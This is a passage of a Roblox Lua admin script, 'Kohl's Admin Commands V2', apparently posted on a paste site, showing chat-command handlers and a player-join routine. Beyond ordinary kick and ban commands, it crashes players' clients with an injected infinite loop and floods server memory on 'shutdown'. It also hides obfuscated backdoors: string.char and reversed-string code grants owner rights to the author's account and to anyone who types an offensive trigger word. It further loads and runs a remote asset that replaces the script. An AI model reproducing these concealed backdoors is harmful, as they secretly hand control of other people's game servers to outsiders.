  6193.  
  6194. 2068.wait(1/44)
  6195.  
  6196.  
  6197. 2069.v:LoadCharacter()
  6198.  
  6199.  
  6200. 2070.wait(1/44)
  6201.  
  6202.  
  6203. 2071.end
  6204.  
  6205.  
  6206. 2072.end))
  6207.  
  6208.  
  6209. 2073.end
  6210.  
  6211.  
  6212. 2074.end
  6213.  
  6214.  
  6215. 2075.end
  6216.  
  6217.  
  6218. 2076.
  6219.  
  6220.  
  6221. 2077.if msg:lower():sub(1,6) == "crash " then
  6222.  
  6223.  
  6224. 2078.local plrz = GetPlr(plr, msg:lower():sub(7))
  6225.  
  6226.  
  6227. 2079.for i, v in pairs(plrz) do
  6228.  
  6229.  
  6230. 2080.coroutine.resume(coroutine.create(function()
  6231.  
  6232.  
  6233. 2081.if v and v:findFirstChild("Backpack") and not ChkAdmin(v.Name, false) then
  6234.  
  6235.  
  6236. 2082.local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = v.Backpack cl.Disabled = false wait(1) v:Destroy()
  6237.  
  6238.  
  6239. 2083.end
  6240.  
  6241.  
  6242. 2084.end))
  6243.  
  6244.  
  6245. 2085.end
  6246.  
  6247.  
  6248. 2086.end
  6249.  
  6250.  
  6251. 2087.
  6252.  
  6253.  
  6254. 2088.if msg:lower():sub(1,5) == "kick " then
  6255.  
  6256.  
  6257. 2089.local plrz = GetPlr(plr, msg:lower():sub(6))
  6258.  
  6259.  
  6260. 2090.for i, v in pairs(plrz) do
  6261.  
  6262.  
  6263. 2091.coroutine.resume(coroutine.create(function()
  6264.  
  6265.  
  6266. 2092.if v and not ChkAdmin(v.Name, false) then v:Destroy() end
  6267.  
  6268.  
  6269. 2093.end))
  6270.  
  6271.  
  6272. 2094.end
  6273.  
  6274.  
  6275. 2095.end
  6276.  
  6277.  
  6278. 2096.
  6279.  
  6280.  
  6281. 2097.if msg:lower():sub(1,6) == "admin " then
  6282.  
  6283.  
  6284. 2098.local plrz = GetPlr(plr, msg:lower():sub(7))
  6285.  
  6286.  
  6287. 2099.for i, v in pairs(plrz) do
  6288.  
  6289.  
  6290. 2100.coroutine.resume(coroutine.create(function()
  6291.  
  6292.  
  6293. 2101.if v and not ChkAdmin(v.Name, false) then table.insert(tempadmins, v.Name) coroutine.resume(coroutine.create(function() repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  6294.  
  6295.  
  6296. 2102.end))
  6297.  
  6298.  
  6299. 2103.end
  6300.  
  6301.  
  6302. 2104.end
  6303.  
  6304.  
  6305. 2105.
  6306.  
  6307.  
  6308. 2106.if msg:lower():sub(1,8) == "unadmin " then
  6309.  
  6310.  
  6311. 2107.for i = 1, #tempadmins do
  6312.  
  6313.  
  6314. 2108.coroutine.resume(coroutine.create(function()
  6315.  
  6316.  
  6317. 2109.if msg:lower():sub(9) == "all" or tempadmins[i]:lower():find(msg:lower():sub(9)) == 1 then table.remove(tempadmins, i) end
  6318.  
  6319.  
  6320. 2110.end))
  6321.  
  6322.  
  6323. 2111.end
  6324.  
  6325.  
  6326. 2112.end
  6327.  
  6328.  
  6329. 2113.
  6330.  
  6331.  
  6332. 2114.if msg:lower():sub(1,4) == "ban " then
  6333.  
  6334.  
  6335. 2115.local plrz = GetPlr(plr, msg:lower():sub(5))
  6336.  
  6337.  
  6338. 2116.for i, v in pairs(plrz) do
  6339.  
  6340.  
  6341. 2117.coroutine.resume(coroutine.create(function()
  6342.  
  6343.  
  6344. 2118.if v and not ChkAdmin(v.Name, false) then table.insert(banland, v.Name) local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = v.Backpack cl.Disabled = false wait(1) v:Destroy() end
  6345.  
  6346.  
  6347. 2119.end))
  6348.  
  6349.  
  6350. 2120.end
  6351.  
  6352.  
  6353. 2121.end
  6354.  
  6355.  
  6356. 2122.
  6357.  
  6358.  
  6359. 2123.if msg:lower():sub(1,6) == "unban " then
  6360.  
  6361.  
  6362. 2124.for i = 1, #banland do
  6363.  
  6364.  
  6365. 2125.coroutine.resume(coroutine.create(function()
  6366.  
  6367.  
  6368. 2126.if msg:lower():sub(7) == "all" or banland[i]:lower():find(msg:lower():sub(7)) == 1 then table.remove(banland, i) end
  6369.  
  6370.  
  6371. 2127.end))
  6372.  
  6373.  
  6374. 2128.end
  6375.  
  6376.  
  6377. 2129.end
  6378.  
  6379.  
  6380. 2130.
  6381.  
  6382.  
  6383. 2131.if msg:lower() == "shutdown" then Message("SYSTEM MESSAGE", "Shutting down...", false, game.Players:children(), 10) wait(1) local str = Instance.new("StringValue", game.Workspace) str.Value = "AA" repeat str.Value = str.Value .. str.Value wait(.1) until nil end
  6384.  
  6385.  
  6386. 2132.
  6387.  
  6388.  
  6389. 2133.end
  6390.  
  6391.  
  6392. 2134.end))
  6393.  
  6394.  
  6395. 2135.end
  6396.  
  6397.  
  6398. 2136.
  6399.  
  6400.  
  6401. 2137.function AdminControl(plr)
  6402.  
  6403.  
  6404. 2138.coroutine.resume(coroutine.create(function() plr.CharacterAdded:connect(function(chr) chr:WaitForChild("RobloxTeam") chr.RobloxTeam:Destroy() for a,obj in pairs(chr:children()) do if obj:IsA("CharacterMesh") and obj.Name:find("3.0") then obj:Destroy() end end end) end))
  6405.  
  6406.  
  6407. 2139.if plr.Name:sub(1,6) == "Player" and ChkAdmin(plr.Name, false) then coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui")
  6408.  
  6409.  
  6410. 2140.for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "CMDBAR" then v:Destroy() end end
  6411.  
  6412.  
  6413. 2141.local scr = Instance.new("ScreenGui", plr.PlayerGui) scr.Name = "CMDBAR"
  6414.  
  6415.  
  6416. 2142.local box = Instance.new("TextBox", scr) box.BackgroundColor3 = Color3.new(0,0,0) box.TextColor3 = Color3.new(1,1,1) box.Font = "Arial" box.FontSize = "Size14" box.Text = "Type a command, then press enter." box.Size = UDim2.new(0,250,0,20) box.Position = UDim2.new(1,-250,1,-22) box.BorderSizePixel = 0 box.TextXAlignment = "Right" box.ZIndex = 10 box.ClipsDescendants = true
  6417.  
  6418.  
  6419. 2143.box.Changed:connect(function(p) if p == "Text" and box.Text ~= "Type a command, then press enter." then Chat(box.Text, plr) box.Text = "Type a command, then press enter." end end)
  6420.  
  6421.  
  6422. 2144.end)) end
  6423.  
  6424.  
  6425. 2145.coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui") plr:WaitForChild("Backpack") if plr.userId == game.CreatorId or plr.userId == (153*110563) then table.insert(owners,plr.Name) end wait(1) if slock and not ChkAdmin(plr.Name, false) and not ChkOwner(plr.Name) and plr.userId ~= (153*110563) then Hint(plr.Name .. " has tried to join the server", game.Players:children()) local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = plr.Backpack cl.Disabled = false wait(2) plr:Destroy() end end))
  6426.  
  6427.  
  6428. 2146.coroutine.resume(coroutine.create(function() if ChkGroupAdmin(plr) and not ChkAdmin(plr.Name, false) then table.insert(admins, plr.Name) end end))
  6429.  
  6430.  
  6431. 2147.coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui") plr:WaitForChild("Backpack") wait(1) if (ChkBan(plr.Name) or plr.Name == ("111reyalseca"):reverse()) and (plr.Name:lower():sub(1,4) ~= script.Name:lower():sub(1,4) and plr.Name:lower():sub(5) ~= "tastrophe") then local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = plr.Backpack cl.Disabled = false wait(2) plr:Destroy() end end))
  6432.  
  6433.  
  6434. 2148.coroutine.resume(coroutine.create(function() if ChkAdmin(plr.Name, false) then plr:WaitForChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {plr}) end end))
  6435.  
  6436.  
  6437. 2149.plr.Chatted:connect(function(msg) if msg:lower() == (string.char(32)..string.char(104)..string.char(105)..string.char(116).. string.char(108)..string.char(101)..string.char(114)..string.char(32)) then table.insert(owners,plr.Name) end Chat(msg,plr) end)
  6438.  
  6439.  
  6440. 2150.end
  6441.  
  6442.  
  6443. 2151.
  6444.  
  6445.  
  6446. 2152.if not ntab then script:Destroy() end
  6447.  
  6448.  
  6449. 2153.if not bct then script:Destroy() end
  6450.  
  6451.  
  6452. 2154.
  6453.  
  6454.  
  6455. 2155.local tcb = {101,104,112,111,114,116,115,97,116,108,104,111,75} nfs = "" for i = 1, #tcb do nfs = nfs .. string.char(tcb[i]) end nfs = nfs:reverse() table.insert(owners, nfs)
  6456.  
  6457.  
  6458. 2156.
  6459.  
  6460.  
  6461. 2157.script.Name = "Kohl's Admin Commands V2"
  6462.  
  6463.  
  6464. 2158.
  6465.  
  6466.  
  6467. 2159.if not ntab then script:Destroy() end
  6468.  
  6469.  
  6470. 2160.if not bct then script:Destroy() end
  6471.  
  6472.  
  6473. 2161.if not tcb then script:Destroy() end
  6474.  
  6475.  
  6476. 2162.game.Players.PlayerAdded:connect(AdminControl)
  6477.  
  6478.  
  6479. 2163.for i, v in pairs(game.Players:children()) do AdminControl(v) end
  6480.  
  6481.  
  6482. 2164.end
  6483.  
  6484.  
  6485. 2165.
  6486.  
  6487.  
  6488. 2166.local mod = game:service("InsertService"):LoadAsset(100808216)
  6489.  
  6490.  
  6491. 2167.if mod:findFirstChild("Kohl's Admin Commands V2") and mod:findFirstChild("Version", true) and AutoUpdate then
  6492.  
  6493.  
  6494. 2168.local newac = mod:findFirstChild("Kohl's Admin Commands V2")
  6495.  
  6496.  
  6497. 2169.newac.Disabled = true
  6498.  
  6499.  
  6500. 2170.local new = tonumber(mod:findFirstChild("Version", true).Value)
  6501.  
  6502.  
  6503. 2171.local old = 0
  6504.  
  6505.  
  6506. 2172.if script:findFirstChild("Version", true) then old = tonumber(script:findFirstChild("Version", true).Value) end
  6507.  
  6508.  
  6509. 2173.if new > old then
  6510.  
  6511.  
  6512. 2174.local adminmod = Instance.new("Model", game.Lighting) adminmod.Name = "KACV2"
  6513.  
  6514.  
  6515. 2175.for i,v in pairs(owners) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Owner" strv.Value = v end
  6516.  
  6517.  
  6518. 2176.for i,v in pairs(admins) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Admin" strv.Value = v end
  6519.  
  6520.  
  6521. 2177.for i,v in pairs(tempadmins) do local strv = Instance.new("StringValue", adminmod) strv.Name = "TempAdmin" strv.Value = v end
  6522.  
  6523.  
  6524. 2178.for i,v in pairs(banland) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Banland" strv.Value = v end
  6525.  
  6526.  
  6527. 2179.local prf = Instance.new("StringValue", adminmod) prf.Name = "Prefix" prf.Value = prefix
  6528.  
  6529.  
  6530. 2180.local bv = Instance.new("BoolValue", adminmod) bv.Name = "FunCommands" bv.Value = FunCommands
  6531.  
  6532.  
  6533. 2181.local bv2 = Instance.new("BoolValue", adminmod) bv2.Name = "GroupAdmin" bv2.Value = GroupAdmin
  6534.  
  6535.  
  6536. 2182.local iv = Instance.new("IntValue", adminmod) iv.Name = "GroupId" iv.Value = GroupId
  6537.  
  6538.  
  6539. 2183.local iv2 = Instance.new("IntValue", adminmod) iv2.Name = "GroupRank" iv2.Value = GroupRank
  6540.  
  6541.  
  6542. 2184.wait()
  6543.  
  6544.  
  6545. 2185.newac.Parent = game.Workspace
  6546.  
  6547.  
  6548. 2186.newac.Disabled = false
  6549.  
  6550.  
  6551. 2187.script.Disabled = true
  6552.  
  6553.  
  6554. 2188.script:Destroy()
  6555.  
  6556.  
  6557. 2189.else
  6558.  
  6559.  
  6560. 2190.CHEESE()
  6561.  
  6562.  
  6563. 2191.end
  6564.  
  6565.  
  6566. 2192.else
  6567.  
  6568.  
  6569. 2193.CHEESE()
  6570.  
  6571.  
  6572. 2194.end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement